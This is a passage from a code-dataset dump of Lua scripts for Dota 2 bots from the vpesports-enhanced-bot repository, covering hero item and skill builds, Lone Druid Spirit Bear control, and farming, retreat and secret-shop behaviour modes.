"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_gauntlets\",\n \"item_circlet\",\n \"item_recipe_bracer\",\n \"item_tango\",\n \"item_boots\",\n \"item_blades_of_attack\",\n \"item_helm_of_iron_will\",\n \"item_gloves\",\n \"item_recipe_armlet\",\n \"item_belt_of_strength\",\n \"item_gloves\",\n \"item_ogre_axe\",\n \"item_mithril_hammer\",\n \"item_recipe_black_king_bar\",\n \"item_ogre_axe\",\n \"item_belt_of_strength\",\n \"item_recipe_sange\",\n \"item_talisman_of_evasion\",\n \"item_ogre_axe\",\n \"item_boots_of_elves\",\n \"item_boots_of_elves\",\n \"item_platemail\",\n \"item_chainmail\",\n \"item_hyperstone\",\n \"item_recipe_assault\"\n}\n\nlocal inner_vitality = \"huskar_inner_vitality\"\nlocal burning_spear = \"huskar_burning_spear\"\nlocal berserkers_blood = \"huskar_berserkers_blood\"\nlocal life_break = \"huskar_life_break\"\n\nX[\"skills\"] = {\n burning_spear, --1\n berserkers_blood, --2 \n burning_spear, --3\n inner_vitality, --4\n burning_spear, --5\n life_break, --6\n burning_spear, --7\n berserkers_blood, --8\n berserkers_blood, --9\n talents[2], --10\n berserkers_blood, --11\n life_break, --12\n inner_vitality, --13\n inner_vitality, --14\n talents[4], --15\n inner_vitality, --16\n -- \"-1\", --17\n life_break, --18\n -- \"-1\", --19\n talents[6], --20\n -- \"-1\", \t --21\n -- \"-1\", \t --22\n -- \"-1\", --23\n -- \"-1\", --24\n talents[9] --25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.673454225063324,
"alphanum_fraction": 0.6861809492111206,
"avg_line_length": 27.659574508666992,
"blob_id": "8f99aa6a6edeb775cb3f615c0ff9c234d0587430",
"content_id": "bf395dc8c3dd91f810ce29d9ce0765df7b3916ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 9429,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 329,
"path": "/bot_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\n-- Bear Modes\nlocal retreat = 0\nlocal attack = 0\nlocal farm = 0\nlocal laning = 0\nlocal follow = 0\n\n-- Bear Stats\nlocal action = nil\nlocal bearLoc = nil\nlocal bearAction = nil\nlocal bearMana = nil\nlocal bearHealth = nil\nlocal bearMaxHealth = nil\nlocal bearMaxMana = nil\nlocal bearHPRegen = nil\nlocal bearManaRegen = nil\n\nlocal botMode = nil\nlocal bearMode = nil\nlocal fountain = GetShopLocation(GetTeam(), SHOP_HOME)\n\nfunction MinionThink(minion)\n\tif minion ~= nil then\n\t\tlocal minionName = minion:GetUnitName()\n\t\t\n\t\tif string.find(minionName, \"npc_dota_lone_druid_bear\") then\n\t\t\tbotMode = npcBot:GetActiveMode()\n\t\t\tnpcBot.bear = minion\n\t\t\tnpcBot.bear.roar = minion:GetAbilityByName(\"lone_druid_savage_roar_bear\")\n\t\t\tnpcBot.bear.tele = minion:GetAbilityByName(\"lone_druid_spirit_bear_return\")\n\t\t\taction = minion:GetCurrentActionType()\n\t\t\tbearLoc = minion:GetLocation()\n \tbearAction = minion:GetCurrentActionType()\n \tbearMana = minion:GetMana()\n \tbearHealth = minion:GetHealth()\n \tbearMaxHealth = minion:GetMaxHealth()\n \tbearMaxMana = minion:GetMaxMana()\n \tbearHPRegen = minion:GetHealthRegen()\n \tbearManaRegen = minion:GetManaRegen()\n\t\t\tgetAllDesires(minion)\n\t\t\tlocal prevMode = bearMode\n\t\t\tbearMode = getHighestDesire()\n\t\t\t\n\t\t\tif prevMode ~= nil and prevMode ~= bearMode then\n\t\t\t\tprint(\" Bear Mode: \" .. _G.getDesireString(bearMode))\n\t\t\tend\n\t\t\t\n\t\t\tbearAbilityUsageThink(minion)\n\t\t\t\n\t\t\tif bearMode == BOT_MODE_RETREAT then\n\t\t\t\tRetreat(minion)\n\t\t\telseif bearMode == BOT_MODE_ATTACK then\n\t\t\t\tAttack(minion)\n\t\t\telseif bearMode == BOT_MODE_FARM then\n\t\t\t\tFarm(minion)\n\t\t\telseif bearMode == BOT_MODE_LANING then\n\t\t\t\tLaning(minion)\n\t\t\telseif bearMode == BOT_MODE_NONE then\n\t\t\t\tFollow(minion)\n\t\t\telseif bearMode == BOT_MODE_ITEM then\n\t\t\t\tpickupItem(minion.item)\n\t\t\tend\n\t\tend\n\tend\nend\n\n-- OTHER FUNCTIONS ---------------------------------------------------------------------------------\nfunction pickupItem(toTransfer)\n\tlocal botDist = GetUnitToUnitDistance(npcBot, npcBot.bear)\n\t\n\tif botDist < 200 then\n \tnpcBot.bear:Action_PickUpItem(toTransfer)\n \n \tfor i = 0, 8 do \n \t\tlocal item = npcBot.bear:GetItemInSlot(i)\n \t\tif item ~= nil and item:GetName() == toTransfer:GetName() then\n \t\t\tprint(\" \" .. tostring(npcBot.bear.item))\n \t\t\tprint(\" \" .. 
tostring(npcBot.bear.pickupitem))\n\t\t\t\tnpcBot.bear.item = nil\n\t\t\t\tnpcBot.bear.pickupitem = false\n\t\t\t\tprint(npcBot.bear.item)\n\t\t\t\tprint(npcBot.bear.pickupitem)\n\t\t\tend\n\t\tend\n\telse\n\t\tif action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\tnpcBot.bear:Action_MoveToLocation(npcBot:GetLocation())\n\t\tend\n\tend\nend\n\nfunction bearAbilityUsageThink(bear)\n\tlocal enemyHeroes = bear:GetNearbyHeroes(350, true, BOT_MODE_NONE)\n\t\n\tif table.getn(enemyHeroes) > 0 then\n\t\tif action ~= BOT_ACTION_TYPE_USE_ABILITY and bear.roar:IsFullyCastable() then\n\t\t\tbear:Action_UseAbility(bear.roar)\n\t\tend\n\tend\nend\n\n-- MODES -------------------------------------------------------------------------------------------\nfunction Retreat(bear)\n\tlocal nearbyHeroes = bear:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\t\n\tif table.getn(nearbyHeroes) > 0 and bear.roar:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal enemyTarget = nearbyHeroes[1]:GetAttackTarget()\n\t\tlocal distEnemy = GetUnitToUnitDistance(bear, nearbyHeroes[1])\n\t\tif enemyTarget == npcBot or enemyTarget == bear then\n\t\t\t-- close the gap until the bear is inside Savage Roar range, then roar\n\t\t\tif distEnemy > 325 and action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\t\tbear:Action_MoveToLocation(nearbyHeroes[1]:GetLocation() + RandomVector(50))\n\t\t\telseif distEnemy <= 325 and action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\t\tbear:Action_UseAbility(bear.roar)\n\t\t\telse\n\t\t\t\tbear:Action_MoveToLocation(fountain)\n\t\t\tend\n\t\telse\n\t\t\tbear:Action_MoveToLocation(fountain)\n\t\tend\n\telse\n\t\tbear:Action_MoveToLocation(fountain)\n\tend\nend\n\nfunction Attack(bear)\n\tlocal laneCreeps = bear:GetNearbyLaneCreeps(1000, true)\n\tlocal enemyHeroes = bear:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal neutrals = bear:GetNearbyNeutralCreeps(500)\n\tlocal botTarget = npcBot:GetAttackTarget()\n\tlocal nearbyTowers = npcBot:GetNearbyTowers(1000, true)\n\t\n\tif botTarget == nil or not botTarget:IsHero() then\n\t\tif table.getn(laneCreeps) > 0 then\n\t\t\tlocal toAttack = laneCreeps[1]\n\t\t\t\n\t\t\tfor c = 2, table.getn(laneCreeps) do\n\t\t\t\tlocal creep = laneCreeps[c]\n\t\t\t\t\n\t\t\t\tif toAttack:GetHealth() > creep:GetHealth() then\n\t\t\t\t\ttoAttack = creep\n\t\t\t\tend\n\t\t\tend\n\t\t\t\n\t\t\tif action ~= BOT_ACTION_TYPE_ATTACK then\n\t\t\t\tbear:Action_AttackUnit(toAttack, true)\n\t\t\tend\n\t\telseif table.getn(neutrals) > 0 then\n\t\t\tlocal toAttack = neutrals[1]\n\t\t\t\n\t\t\tfor n = 2, table.getn(neutrals) do\n\t\t\t\tlocal neutral = neutrals[n]\n\t\t\t\t\n\t\t\t\tif toAttack:GetHealth() < neutral:GetHealth() then\n\t\t\t\t\ttoAttack = neutral\n\t\t\t\tend\n\t\t\tend\n\t\t\t\n\t\t\tif action ~= BOT_ACTION_TYPE_ATTACK then\n\t\t\t\tbear:Action_AttackUnit(toAttack, true)\n\t\t\tend\n\t\telseif table.getn(nearbyTowers) > 0 and action ~= BOT_ACTION_TYPE_ATTACK then\n\t\t\tbear:Action_AttackUnit(nearbyTowers[1], true)\n\t\tend\n\telseif botTarget ~= nil and botTarget:IsHero() then\n\t\tif action ~= BOT_ACTION_TYPE_ATTACK then\n\t\t\tbear:Action_AttackUnit(botTarget, true)\n\t\tend\n\tend\nend\n\nfunction Farm(bear)\n\tlocal nearbyNeutrals = bear:GetNearbyNeutralCreeps(600)\n\tlocal numNeutrals = table.getn(nearbyNeutrals)\n\t\n\tif numNeutrals > 0 then\n\t\tif action ~= BOT_ACTION_TYPE_ATTACK and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\t-- attack one creep from the camp; Action_AttackUnit takes a unit, not a table\n\t\t\tbear:Action_AttackUnit(nearbyNeutrals[1], true)\n\t\tend\n\telse\n\t\tif action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tbear:Action_MoveToLocation(npcBot:GetLocation() + 
RandomVector(100))\n\t\tend\n\tend\nend\n\nfunction Laning(bear)\n\tlocal laneFront = GetLaneFrontLocation(TEAM_RADIANT, LANE_MID, 200)\n\tlocal frontDist = GetUnitToLocationDistance(bear, laneFront)\n\t\n\tif frontDist > 500 and bearAction ~= BOT_ACTION_TYPE_ATTACK and bearAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tbear:Action_MoveToLocation(laneFront)\n\tend\n\tAttack(bear)\nend\n\nfunction Follow(bear)\n\tbear:Action_MoveToLocation(npcBot:GetLocation())\nend\n\n-- DESIRES -----------------------------------------------------------------------------------------\nfunction getAllDesires(bear)\n\tretreat = getRetreatDesire(bear)\n\tattack = getAttackDesire(bear)\n\tfarm = getFarmDesire(bear)\n\tlaning = getLaningDesire(bear)\n\tfollow = getFollowDesire(bear)\nend\n\nfunction getHighestDesire()\n\tlocal highestMode = BOT_MODE_RETREAT\n\tlocal highest = retreat\n\t\n\tif attack > highest then\n\t\thighestMode = BOT_MODE_ATTACK\n\t\thighest = attack\n\tend\n\t\n\tif farm > highest then\n\t\thighestMode = BOT_MODE_FARM\n\t\thighest = farm\n\tend\n\t\n\tif laning > highest then\n\t\thighestMode = BOT_MODE_LANING\n\t\thighest = laning\n\tend\n\t\n\tif follow > highest then\n\t\thighestMode = BOT_MODE_NONE\n\t\thighest = follow\n\tend\n\t\n\tif npcBot.bear.pickupitem then\n\t\thighestMode = BOT_MODE_ITEM\n\tend\n\t\n\treturn highestMode\nend\n\nfunction getRetreatDesire(bear)\n\tlocal nearbyEnemies = bear:GetNearbyHeroes(650, true, BOT_MODE_NONE)\n\tlocal nearbyAllies = bear:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal nearbyTowers = bear:GetNearbyTowers(1000, true)\n\tlocal nearbyCreeps = bear:GetNearbyLaneCreeps(150, true)\n\tlocal currentAction = bear:GetCurrentActionType()\n\tlocal damagedByCreep = bear:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = bear:WasRecentlyDamagedByAnyHero(1)\n\tlocal botCurrentHP = bear:GetHealth()\n\tlocal botMaxHP = bear:GetMaxHealth()\n\tlocal botLoc = bear:GetLocation()\n\t\n\tlocal closerEnemies = bear:GetNearbyHeroes(400, true, BOT_MODE_NONE)\n\tlocal fartherEnemies = bear:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\n\tif bear:IsChanneling() then\n\t\treturn _G.desires[1] -- desires is 1-indexed; [1] is BOT_MODE_DESIRE_NONE\n\tend\n\t\n\tif (#fartherEnemies > 1)\n\t\tor (#closerEnemies > 0)\n\t\tor (#nearbyEnemies > 0 and currentAction ~= BOT_ACTION_TYPE_USE_ABILITY and not bear:IsChanneling())\n\t\tor (botCurrentHP/botMaxHP < 0.2 and currentAction ~= BOT_ACTION_TYPE_USE_ABILITY and not bear:IsChanneling())\n\t\tor ((damagedByCreep and #nearbyCreeps > 3) or damagedByHero) then\n\t\t\n\t\treturn _G.desires[7]\n\tend\n\t\n\tif #nearbyTowers > 0 then\n\t\tif not isTowerSafe(bear, nearbyTowers[1]) then\n\t\t\treturn _G.desires[7]\n\t\tend\n\tend\n\t\n\tfor i,enemy in ipairs(fartherEnemies) do\n\t\tlocal enemyLoc = enemy:GetLocation()\n\t\tlocal enemyRange = enemy:GetAttackRange()\n\t\t\n\t\tif enemyRange > 200 then\n\t\t\tlocal dist = _G.getDistance(enemyLoc, botLoc)\n\t\t\tif dist < (enemyRange + 200) then\n\t\t\t\treturn _G.desires[7]\n\t\t\tend\n\t\tend\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction getAttackDesire(bear)\n\tif botMode == BOT_MODE_ATTACK then\n\t\treturn _G.desires[6]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction getFarmDesire(bear)\n\tif botMode == BOT_MODE_FARM then\n\t\treturn _G.desires[6]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction getLaningDesire(bear)\n\tif botMode == BOT_MODE_LANING then\n\t\treturn _G.desires[6]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction getFollowDesire(bear)\n\tlocal druidDist = GetUnitToUnitDistance(npcBot, bear)\n\tlocal 
aghaSlot = npcBot:FindItemSlot(\"item_ultimate_scepter\")\n\t\n\tif druidDist > 1000 and npcBot:GetItemSlotType(aghaSlot) ~= ITEM_SLOT_TYPE_MAIN then\n\t\treturn _G.desires[7]\n\tend\n\t\n\treturn _G.desires[1]\nend\n"
},
{
"alpha_fraction": 0.7070919275283813,
"alphanum_fraction": 0.7289131283760071,
"avg_line_length": 29.1645565032959,
"blob_id": "6cac71e3aee2869fd531041ec20ce9f116d701bb",
"content_id": "d1dcd0e29a8fea1301d9f960cecbd675da38e9f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2383,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 79,
"path": "/mode_retreat_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\")\nrequire( GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\n\nfunction OnStart()\n\tnpcBot:Action_ClearActions(true)\nend\n\n-- When faced with multiple enemies, fall back to a safe location\nfunction Think()\n\tlocal fountain = GetShopLocation(GetTeam(), SHOP_HOME)\n\tlocal missile = npcBot:GetAbilityByName(\"tinker_heat_seeking_missile\")\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\t\n\tif _G.getDistance(fountain, npcBot:GetLocation()) > 100 then\n\t\tnpcBot:Action_MoveToLocation(fountain)\n\tend\n\t\n\t-- Use Missile if enemy nearby\n\tif missile ~= nil and missile:IsFullyCastable() and #enemies > 0 then\n\t\tnpcBot:Action_UseAbility(missile)\n\tend\nend\n\nfunction GetDesire()\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal nearbyTowers = npcBot:GetNearbyTowers(1000, true)\n\tlocal nearbyCreeps = npcBot:GetNearbyCreeps(300, true)\n\tlocal allyCreeps = npcBot:GetNearbyCreeps(1600, false)\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByAnyHero(1)\n\tlocal botCurrentHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal botMode = npcBot:GetActiveMode()\n\t\n\tif botMode == BOT_MODE_ROAM and table.getn(closerEnemies) > 0 then\n\t\treturn _G.desires[7]\n\tend\n\t\n\tif npcBot:IsChanneling() then\n\t\treturn _G.desires[0]\n\tend\n\t\n\tif table.getn(nearbyEnemies) > 0 then\n\t\treturn _G.desires[7]\n\tend\n\t\n\tfor e = 1, table.getn(nearbyEnemies) do\n\t\tlocal enemy = nearbyEnemies[e]\n\t\tlocal dist = GetUnitToUnitDistance(npcBot, enemy)\n\t\tlocal enemyTarget = enemy:GetAttackTarget()\n\t\tlocal isTargetted = false\n\t\t\n\t\tif enemyTarget ~= nil then\n\t\t\tisTargetted = enemyTarget:GetUnitName() == npcBot:GetUnitName()\n\t\tend\n\t\t\n\t\tif dist < 500 or (dist > 500 and isTargetted) then\n\t\t\treturn _G.desires[7]\n\t\tend\n\tend\n\t\n\tif (botCurrentHP/botMaxHP < 0.2 and not npcBot:IsChanneling())\n \tor (damagedByCreep and table.getn(nearbyCreeps) > 3) then\n \t\n\t\treturn _G.desires[7]\n\tend\n\t\n\tif table.getn(nearbyTowers) > 0 then\n\t\t-- \n\tend\n\t\n\treturn _G.desires[0]\nend\n"
},
{
"alpha_fraction": 0.5887658596038818,
"alphanum_fraction": 0.6018860340118408,
"avg_line_length": 22.461538314819336,
"blob_id": "079e0263ded24890eefe7010db623958465f7376",
"content_id": "74bd6b8efd5fc315d760feaab66cf2ae3a7c8fb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2439,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 104,
"path": "/item_build_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_tango\",\n \"item_stout_shield-bear\",\n \"item_quelling_blade-bear\",\n \"item_orb_of_venom-bear\",\n \"item_boots-bear\",\n \"item_recipe_hand_of_midas\",\n \"item_gloves\",\n \"item_boots\",\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n \"item_enchanted_mango\",\n \"item_relic-bear\",\n \"item_recipe_radiance-bear\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n \"item_platemail-bear\",\n \"item_hyperstone-bear\",\n \"item_chainmail-bear\",\n \"item_recipe_assault-bear\",\n \"item_point_booster\",\n \"item_staff_of_wizardry\",\n \"item_ogre_axe\",\n \"item_blade_of_alacrity\",\n \"item_belt_of_strength-bear\",\n \"item_javelin-bear\",\n \"item_recipe_basher-bear\",\n \"item_ring_of_health-bear\",\n \"item_vitality_booster-bear\",\n \"item_stout_shield-bear\",\n \"item_recipe_abyssal_blade-bear\",\n \"item_hyperstone-bear\",\n \"item_javelin-bear\",\n \"item_javelin-bear\",\n \"item_mithril_hammer-bear\",\n \"item_gloves-bear\",\n \"item_recipe_maelstrom-bear\",\n \"item_hyperstone-bear\",\n \"item_recipe_mjollnir-bear\",\n}\n\nlocal spirit = \"lone_druid_spirit_bear\"\nlocal rabid = \"lone_druid_rabid\"\nlocal roar = \"lone_druid_savage_roar\"\nlocal form = \"lone_druid_true_form\"\n\nlocal t1 = \"special_bonus_hp_250\"\nlocal t2 = \"special_bonus_unique_lone_druid_2\"\nlocal t3 = \"special_bonus_unique_lone_druid_6\"\nlocal t4 = \"special_bonus_unique_lone_druid_7\"\n\n-- Abilities:\n-- lone_druid_spirit_bear\n-- lone_druid_rabid\n-- lone_druid_savage_roar\n-- lone_druid_true_form_battle_cry\n-- generic_hidden\n-- lone_druid_true_form\n-- lone_druid_true_form_druid\n-- Talents:\n-- special_bonus_hp_250\n-- special_bonus_attack_range_175\n-- special_bonus_unique_lone_druid_4\n-- special_bonus_unique_lone_druid_2\n-- special_bonus_unique_lone_druid_8\n-- special_bonus_unique_lone_druid_6\n-- special_bonus_unique_lone_druid_9\n-- special_bonus_unique_lone_druid_7\n\nX[\"skills\"] = {\n spirit, \n roar, \n spirit, \n rabid, \n spirit,\n rabid, \n spirit, \n rabid, \n rabid, \n t1,\n form, \n form,\n roar,\n roar,\n t2,\n roar, \n \"-1\", \n form,\n \"-1\", \t\n t3,\n \"-1\", \t\n \"-1\", \t\n \"-1\", \n \"-1\", \n t4\n}\n\nreturn X"
},
{
"alpha_fraction": 0.7194244861602783,
"alphanum_fraction": 0.7235354781150818,
"avg_line_length": 26.05555534362793,
"blob_id": "aec48a89f19b084a1239d6c461c471e515949db0",
"content_id": "ffa8173b2819641d5441438be70b58e7908293a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 973,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 36,
"path": "/mode_secret_shop_abyssal_underlord.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = npcBot:GetTeam()\n\nfunction GetDesire()\n local mode = npcBot:GetActiveMode();\n\tlocal modeDesire = npcBot:GetActiveModeDesire();\n\n\tif npcBot.secretShop and mode ~= BOT_MODE_ATTACK and mode ~= BOT_MODE_RETREAT and mode ~= BOT_MODE_DEFEND_ALLY and mode ~= BOT_MODE_EVASIVE_MANEUVERS then\n\t\treturn _G.desires[4]\n\tend\n\t\n\treturn 0\nend\n\nfunction Think()\n\tlocal secretShopLoc = GetShopLocation(botTeam, SHOP_SECRET)\n--\tlocal courier = GetCourier(0)\n--\tif courier ~= nil then\n--\t\tlocal courierState = GetCourierState(courier)\n--\t\t\n--\t\tif courierState == COURIER_STATE_IDLE then\n--\t\t\t-- send courier to secret shop\n--\t\telseif courierState == COURIER_STATE_DELIVERING_ITEMS then\n--\t\t\t-- send bot to secret shop\n--\t\tend\n--\tend\n\tlocal secretDist = npcBot:DistanceFromSecretShop()\n\t\n\tif secretDist > 0 then\n\t\tif not npcBot:IsChanneling() then\n\t\t\tnpcBot:Action_MoveToLocation(secretShopLoc)\n\t\tend\n\telse\n\t\tnpcBot.secretShop = false\n\tend\nend"
},
{
"alpha_fraction": 0.7083333134651184,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 14.666666984558105,
"blob_id": "6d18a8f32e8166fe3e3760b9a8651a72d48024ce",
"content_id": "5d0233b68e7c1eb56f6a2bb9c8a939d81a20563a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 3,
"path": "/mode_push_tower_bot_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "\nfunction GetDesire()\n\treturn _G.desires[1]\nend\n"
},
{
"alpha_fraction": 0.6731975078582764,
"alphanum_fraction": 0.6833855509757996,
"avg_line_length": 30.636363983154297,
"blob_id": "32f439c8691c185f4291cca8e74ef951664102bb",
"content_id": "40c3fe29c440b5037a017c895a196477519f3173",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 3828,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 121,
"path": "/mode_farm_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal targetCamp = nil\nlocal spawners = GetNeutralSpawners()\nlocal finishedCamps = {}\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal botLevel = npcBot:GetLevel()\n\tlocal aghaSlot = npcBot:FindItemSlot(\"item_ultimate_scepter\")\n\t\n\tif gameTime < 0 then\n\t\treturn _G.desires[7]\n\tend\n\tif npcBot:GetItemSlotType(aghaSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\treturn _G.desires[1]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction Think()\n\tlocal gameTime = DotaTime()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal botAction = npcBot:GetCurrentActionType()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHealth = npcBot:GetHealth()\n\tlocal botMaxHealth = npcBot:GetMaxHealth()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHPRegen = npcBot:GetHealthRegen()\n\tlocal botManaRegen = npcBot:GetManaRegen()\n\tlocal level = npcBot:GetLevel()\n\tlocal currentGold = npcBot:GetGold()\n\tlocal currentLane = nil\n\t\n local spirit = npcBot:GetAbilityByName(\"lone_druid_spirit_bear\")\n local rabid = npcBot:GetAbilityByName(\"lone_druid_rabid\")\n local roar = npcBot:GetAbilityByName(\"lone_druid_savage_roar\")\n local form = npcBot:GetAbilityByName(\"lone_druid_true_form\")\n\t\n\tif gameTime < 0 then\n\t\tlocal tower = GetTower(botTeam, TOWER_MID_1)\n\t\tif botAction ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\tnpcBot:Action_MoveToLocation(tower:GetLocation() + RandomVector(300))\n\t\t\tif npcBot.bear ~= nil and npcBot.bear:IsAlive() then\n\t\t\t\tnpcBot.bear:Action_MoveToLocation(tower:GetLocation() + RandomVector(300))\n\t\t\tend\n\t\tend\n\t\treturn\n\tend\n\t\n\tif targetCamp == nil then\n\t\tlocal gotCamp = false\n\t\tfor s = 1, table.getn(spawners) do\n\t\t\tlocal spawner = spawners[s]\n\t\t\t\n\t\t\tif spawner[\"team\"] == botTeam and ((level <= 3 and (spawner[\"type\"] == \"small\" or spawner[\"type\"] == \"medium\"))\n\t\t\tor (level < 6 and (spawner[\"type\"] == \"medium\" or spawner[\"type\"] == \"large\"))\n\t\t\tor (level >= 6 and (spawner[\"type\"] == \"medium\" or spawner[\"type\"] == \"large\" or spawner[\"type\"] == \"ancient\"))) then\n\t\t\t\tlocal found = false\n\t\t\t\tfor i = 1, table.getn(finishedCamps) do\n\t\t\t\t\tlocal finished = finishedCamps[i]\n\t\t\t\t\t\n\t\t\t\t\tif finished[1] == spawner[\"location\"][1] and finished[2] == spawner[\"location\"][2] then\n\t\t\t\t\t\tfound = true\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tif not found then\n\t\t\t\t\ttargetCamp = Vector(spawner[\"location\"][1], spawner[\"location\"][2], 0)\n\t\t\t\t\tgotCamp = true\n\t\t\t\t\tbreak\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t\n\t\t-- Reset camps once they're all destroyed\n\t\tif not gotCamp then\n\t\t\tfinishedCamps = {}\n\t\tend\n\telse\n\t\tlocal dist = GetUnitToLocationDistance(npcBot, targetCamp)\n\t\t\n\t\tif dist > 500 then\n\t\t\tif botAction ~= BOT_ACTION_TYPE_MOVE_TO then\n \t\t\tnpcBot:Action_MoveToLocation(targetCamp + RandomVector(100))\n\t\t\tend\n\t\t\tif npcBot.bear ~= nil and npcBot.bear:GetCurrentActionType() ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\t\tnpcBot.bear:Action_MoveToLocation(targetCamp + RandomVector(100))\n\t\t\tend\n\t\telse\n\t\t\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(500)\n\t\t\tlocal numNeutrals = table.getn(neutrals)\n\t\t\t\n\t\t\tif numNeutrals > 0 then\n\t\t\t\tlocal easiest = neutrals[1]\n\t\t\t\t\n\t\t\t\tfor i = 2, numNeutrals do\n\t\t\t\t\tif 
neutrals[i]:GetHealth() < easiest:GetHealth() then\n\t\t\t\t\t\teasiest = neutrals[i]\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tif botAction ~= BOT_ACTION_TYPE_ATTACK and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\t\t\tnpcBot:Action_AttackUnit(easiest, true)\n\t\t\t\t\t\n\t\t\t\t\tif npcBot.bear ~= nil then\n\t\t\t\t\t\tif npcBot.bear:GetCurrentActionType() ~= BOT_ACTION_TYPE_ATTACK and npcBot.bear:GetCurrentActionType() ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\t\t\t\t\tnpcBot.bear:Action_AttackUnit(easiest, true)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\telse\n\t\t\t\ttable.insert(finishedCamps, targetCamp)\n\t\t\t\ttargetCamp = nil\n\t\t\tend\n\t\tend\n\tend\nend\n"
},
{
"alpha_fraction": 0.6908690929412842,
"alphanum_fraction": 0.696809709072113,
"avg_line_length": 29.09933853149414,
"blob_id": "ad9f50a3d76a5f8743ba745df2222d4d0ab345c0",
"content_id": "3b3c64f93d3e2f0afcfa06576580ccba8d1ef3b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 4545,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 151,
"path": "/bot_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
